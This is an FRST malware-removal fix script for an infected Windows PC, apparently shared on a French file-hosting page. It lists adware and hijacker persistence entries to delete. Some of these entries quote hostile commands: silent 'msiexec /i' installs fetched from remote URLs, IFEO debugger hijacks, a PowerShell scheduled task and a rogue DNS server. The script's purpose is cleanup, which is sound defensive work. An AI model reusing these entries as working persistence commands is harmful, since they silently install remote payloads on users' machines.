cjoint

Publicité


Publicité

Format du document : text/plain

Prévisualisation


start
CloseProcesses:
CreateRestorePoint:
HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe <==== ATTENTION
HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\Run: [background_fault] => "C:\Users\Anaëlle Jolivet\AppData\Local\background_fault\aswRD.exe" "C:\Users\Anaëlle Jolivet\AppData\Local\background_fault\bf.dll",background_fault_collector <==== ATTENTION
HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj8xNWM2NkF5FkM8FkF3RWw8OTlXRYE3MkE1NTLWOUE5RH== /q <==== ATTENTION
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
ShellExecuteHooks: Pas de nom - {A65771C6-0D5A-11E7-9DEF-64006A5CFC23} - C:\Users\Anaëlle Jolivet\AppData\Roaming\Reazaskese\Masgrelerge.dll -> Pas de fichier <==== ATTENTION
GroupPolicy: Restriction <==== ATTENTION
Tcpip\..\Interfaces\{7accb53a-9a35-44e8-949f-b10cb76278c6}: [DhcpNameServer] 40.32.1.55
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?bcutc=sp-006&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2216742683-3699418852-1582624608-1001 -> DefaultScope {5BE328D9-1A31-44F2-A62D-4FC823AB2FFE} URL =
SearchScopes: HKU\S-1-5-21-2216742683-3699418852-1582624608-1001 -> {015DB5FA-EAFB-4592-A95B-F44D3EE87FA9} URL =
FF ProfilePath: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\naweriweentcofise\Profiles\0216rq2e.default\Profiles\0216rq2e.default [non trouvé(e)] <==== ATTENTION
FF ProfilePath: C:\Users\Anaëlle Jolivet\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\0216rq2e.default\Profiles\0216rq2e.default [non trouvé(e)] <==== ATTENTION
FF DefaultSearchUrl: ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default -> hxxps://www.google.com/search?bcutc=sp-006
FF Keyword.URL: ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default -> hxxps://www.google.com/search?bcutc=sp-006
FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\ourluckysites.xml [2017-04-05]
FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\startpageing123.xml [2017-03-31]
FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\startsearch.xml [2017-05-03]
FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\trovi.xml [2017-03-25]
FF SearchPlugin: C:\Users\Anaëlle Jolivet\AppData\Roaming\ZHP\Quarantine\Firefox\Firefox\Firefox\Profiles\0216rq2e.default\searchplugins\yahoo! powered.xml [2016-10-28]
FF Keyword.URL: Mozilla\Firefox\Profiles\0216rq2e.default -> hxxps://www.google.com/search?bcutc=sp-006
CHR res: Infected resources.pak (search_engine). Reinstall Chrome. <==== ATTENTION
CHR StartupUrls: ChromeDefaultData -> "hxxp://www.ourluckysites.com/?type=hp&ts=1491391283&z=910b0adb987bfc6f05476ffg0z2t5gfc8tcgdo0b6c&from=che0812&uid=ST1000LM024XHN-M101MBB_S31QJ9CH528666"
CHR DefaultSearchURL: ChromeDefaultData -> hxxp://www.ourluckysites.com/search/?type=ds&ts=1492418042&z=caa0870b86d794b67be7547gbzbtco1z7gcbee4zcz&from=che0812&uid=ST1000LM024XHN-M101MBB_S31QJ9CH528666&q={searchTerms}
CHR DefaultSearchKeyword: ChromeDefaultData -> ourluckysites
CHR Profile: C:\Users\Anaëlle Jolivet\AppData\Local\Google\Chrome\User Data\ChromeDefaultData [2017-06-28] <==== ATTENTION
CHR HKLM\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [pilplloabdedfmialnfchjomjmpjcoej] - hxxps://clients2.google.com/service/update2/crx
HKU\.DEFAULT\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Antanna\Application\chrome.exe (Google Inc.) <==== ATTENTION
HKU\S-1-5-18\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Bookness\Application\chrome.exe (Google Inc.) <==== ATTENTION
S4 Amazon 1Button App Service; "c:\Program Files (x86)\Amazon\Amazon1ButtonApp\Amazon1ButtonService64.Exe" [X]
R1 NetUtils2016; C:\WINDOWS\system32\drivers\NetUtils2016.sys [909944 2017-06-28] () <==== ATTENTION
2017-06-28 13:55 - 2017-06-28 13:55 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Local\Antanna
2017-06-28 11:21 - 2017-06-28 11:21 - 00000000 ____D C:\Users\Anaëlle Jolivet\AppData\Local\AdvinstAnalytics
2017-06-28 20:20 - 2017-03-25 19:38 - 00909944 _____ C:\WINDOWS\system32\Drivers\NetUtils2016.sys
Task: {3C59C31A-3128-476D-BB6E-083C0D7866F3} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ATTENTION
Task: {8C388A6C-E2B0-437B-82E8-670AA68F4949} - System32\Tasks\f4bRmUEPlwIq => f4brmueplwiq.exe
Task: {CAE23D82-3196-4096-BB55-E2563717EF3D} - System32\Tasks\Qulersyqfot => msiexec.exe /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S31QJ9CH528666&v=20170325 /q <==== ATTENTION
Task: {E73A3FC0-C9B0-4E1E-91D3-5976DFFA2C73} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1 <==== ATTENTION
Task: {FA13BB6E-57E2-45DE-A588-69F5C9ED7B69} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-02-06] () <==== ATTENTION
ShortcutWithArgument: C:\Users\Anaëlle Jolivet\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\2572d0ef8585eb3c\Google Chrome.lnk -> C:\Program Files (x86)\Antanna\Application\chrome.exe (Google Inc.) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494511502&z=48752f05e0d4a49b4bc57f3gfz2tdz3wfg3g0w6efc&from=che0812&uid=ST1000LM024XHN-M101MBB_S31QJ9CH528666
2017-03-25 19:38 - 2017-06-29 11:20 - 00625272 _____ () C:\Windows\System32\NetUtils2016.dll
FirewallRules: [{27244988-8718-4114-A8C0-C0ABDECA7DB4}] => (Block) C:\users\anaëlle jolivet\appdata\roaming\bittorrent\bittorrent.exe
FirewallRules: [{6DDD2D4D-FD93-40EE-AC83-189087134ECD}] => (Block) C:\users\anaëlle jolivet\appdata\roaming\bittorrent\bittorrent.exe
FirewallRules: [UDP Query User{51D4EEB9-016E-4451-AB12-0F4CA3E369D5}C:\users\anaëlle jolivet\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\users\anaëlle jolivet\appdata\roaming\bittorrent\bittorrent.exe
FirewallRules: [TCP Query User{8DC67B52-8947-4157-BF12-BB596F2E9A8C}C:\users\anaëlle jolivet\appdata\roaming\bittorrent\bittorrent.exe] => (Allow) C:\users\anaëlle jolivet\appdata\roaming\bittorrent\bittorrent.exe
FirewallRules: [{A139C14F-2C32-44A3-90F0-0CFD987EEBAB}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm024xhn-m101mbb_s31qj9ch528666.dat
FirewallRules: [{B7F705E6-46CE-4F91-8D54-FA38D6094DD7}] => (Allow) C:\Program Files (x86)\MIO\loader\st1000lm024xhn-m101mbb_s31qj9ch528666.dat
HKU\S-1-5-21-2216742683-3699418852-1582624608-1001\...\ChromeHTML: -> C:\Program Files (x86)\Antanna\Application\chrome.exe (Google Inc.) <==== ATTENTION


EmptyTemp:
end

Publicité


Signaler le contenu de ce document

Publicité